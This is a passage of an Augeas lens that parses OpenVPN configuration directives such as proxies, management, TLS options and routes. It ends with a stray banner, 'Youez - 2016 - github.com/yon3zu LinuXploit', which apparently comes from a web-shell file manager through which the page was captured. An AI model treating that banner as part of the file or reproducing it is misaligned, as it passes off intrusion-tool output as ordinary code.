            . sep . [ label "port"   . port ]
            . (sep . [ label "auth" .  filename_safe ]
                . (sep . [ label "auth-method" . auth_method ]) ? )?
            . comment_or_eol
            ]

let http_proxy_option = [ key "http-proxy-option"
                        . sep . [ label "option" . store /(VERSION|AGENT)/ ]
                        . sep . [ label "value" . filename ]
                        . comment_or_eol
                        ]

let socks_proxy     = [ key "socks-proxy"
                      . sep . [ label "server" . host ]
                      . (sep . [ label "port"   . port ]
                        . (sep . [ label "auth" .  filename_safe ])? )?
                      . comment_or_eol
                      ]

let port_share      = [ key "port-share"
                      . sep . [ label "host" . host ]
                      . sep . [ label "port" . port ]
                      . (sep . [ label "dir" . filename ])?
                      . comment_or_eol
                      ]

let route_delay     = [ key "route-delay"
                    . (sep . [ label "seconds" . num ]
                        . (sep . [ label "win-seconds" . num ] ) ?
                    )?
                    . comment_or_eol
                    ]

let inetd           = [ key "inetd"
                    . (sep . [label "mode" . store /(wait|nowait)/ ]
                        . (sep . [ label "progname" . filename ] ) ?
                    )?
                    . comment_or_eol
                    ]

let inactive        = [ key "inactive"
                    . sep . [ label "seconds" . num ]
                    . (sep . [ label "bytes" . num ] ) ?
                    . comment_or_eol
                    ]

let client_nat      = [ key "client-nat"
                    . sep . [ label "type" . store /(snat|dnat)/ ]
                    . sep . [ label "network" . ip ]
                    . sep . [ label "netmask" . ip ]
                    . sep . [ label "alias" . ip ]
                    . comment_or_eol
                    ]

let status          = [ key "status"
                    . sep . [ label "file" . filename_safe ]
                    . (sep . [ label "repeat-seconds" . num ]) ?
                    . comment_or_eol
                    ]

let plugin          = [ key "plugin"
                    . sep . [ label "file" . filename_safe ]
                    . (sep . [ label "init-string" . filename ]) ?
                    . comment_or_eol
                    ]

let management    = [ key "management" . sep
                    . [ label "server" . ip ]
                    . sep . [ label "port" . port ]
                    . (sep . [ label "pwfile" . filename ] ) ?
                    . comment_or_eol
                    ]

let auth_user_pass_verify   = [ key "auth-user-pass-verify"
                              . sep . [ Quote.quote_spaces (label "command") ]
                              . sep . [ label "method" . store /via-(env|file)/ ]
                              . comment_or_eol
                              ]

let static_challenge    = [ key "static-challenge"
                          . sep . [ Quote.quote_spaces (label "text") ]
                          . sep . [ label "echo" . store /[01]/ ]
                          . comment_or_eol
                          ]

let cryptoapicert        = [ key "cryptoapicert" . sep . Quote.dquote
                          . [ key /[A-Z]+/ . Sep.colon . store /[A-Za-z _-]+/ ]
                          . Quote.dquote . comment_or_eol
                          ]

let setenv =
    let envvar = /[^#;\/ \t\n][A-Za-z0-9_-]+/ in
        [ key ("setenv"|"setenv-safe")
        . sep . [ key envvar . sep . store fn_re ]
        . comment_or_eol
        ]

let redirect =
    let redirect_flag   = /(local|autolocal|def1|bypass-dhcp|bypass-dns|block-local)/ in
        let redirect_key    = "redirect-gateway" | "redirect-private" in
            [ key redirect_key
            . (sep . [ label "flag" . store redirect_flag ] ) +
            . comment_or_eol
            ]

let tls_cipher =
    let ciphername = /[A-Za-z0-9!_-]+/ in
        [ key "tls-cipher" . sep
        . [label "cipher" . store ciphername]
        . (Sep.colon . [label "cipher" . store ciphername])*
        . comment_or_eol
        ]

let remote_cert_ku =
    let usage = [label "usage" . store /[A-Za-z0-9]{1,2}/] in
        [ key "remote-cert-ku" . sep . usage . (sep . usage)* . comment_or_eol ]

(* FIXME: Surely there's a nicer way to do this *)
let remote_cert_eku =
    let oid = [label "oid" . store /[0-9]+\.([0-9]+\.)*[0-9]+/] in
        let symbolic = [Quote.do_quote_opt
            (label "symbol" . store /[A-Za-z0-9][A-Za-z0-9 _-]*[A-Za-z0-9]/)] in
            [ key "remote-cert-eku" . sep . (oid|symbolic) . comment_or_eol ]

let status_version          = [ key "status-version"
                              . (sep . num) ?
                              . comment_or_eol
                              ]

let ifconfig_pool           = [ key "ifconfig-pool"
                              . sep . [ label "start" . ip ]
                              . sep . [ label "end" . ip ]
                              . (sep . [ label "netmask" . ip ])?
                              . comment_or_eol
                              ]

let ifconfig_push           = [ key "ifconfig-push"
                              . sep . [ label "local" . ip ]
                              . sep . [ label "remote-netmask" . ip ]
                              . (sep . [ label "alias" . store /[A-Za-z0-9_-]+/ ] )?
                              . comment_or_eol
                              ]

let ignore_unknown_option   = [ key "ignore-unknown-option"
                              . (sep . [ label "opt" . store /[A-Za-z0-9_-]+/ ] ) +
                              . comment_or_eol
                              ]

let tls_version_min         = [ key "tls-version-min"
                              . sep . store Rx.decimal
                              . (sep . [ key "or-highest" ]) ?
                              . comment_or_eol
                              ]

let crl_verify              = [ key "crl-verify"
                              . sep . filename_safe
                              . (sep . [ key "dir" ]) ?
                              . comment_or_eol
                              ]

let x509_username_field =
    let fieldname = /[A-Za-z0-9_-]+/ in
        let extfield = ([key /ext/ . Sep.colon . store fieldname]) in
            let subjfield = ([label "subj" . store fieldname]) in
                [ key "x509-username-field"
                . sep . (extfield|subjfield)
                . comment_or_eol
                ]

let other   = server
            | server_bridge
            | route
            | push
            | tls_auth
            | remote
            | http_proxy
            | http_proxy_option
            | socks_proxy
            | management
            | route_delay
            | client_nat
            | redirect
            | inactive
            | setenv
            | inetd
            | status
            | status_version
            | plugin
            | ifconfig_pool
            | ifconfig_push
            | ignore_unknown_option
            | auth_user_pass_verify
            | port_share
            | static_challenge
            | tls_version_min
            | tls_cipher
            | cryptoapicert
            | x509_username_field
            | remote_cert_ku
            | remote_cert_eku
            | crl_verify
            | route_ipv6


(************************************************************************
 *                              LENS & FILTER
 *************************************************************************)

let lns    = ( comment | empty | single | single_opt | double | flag | other )*

let filter = (incl "/etc/openvpn/client.conf")
           . (incl "/etc/openvpn/server.conf")

let xfm = transform lns filter

Youez - 2016 - github.com/yon3zu
LinuXploit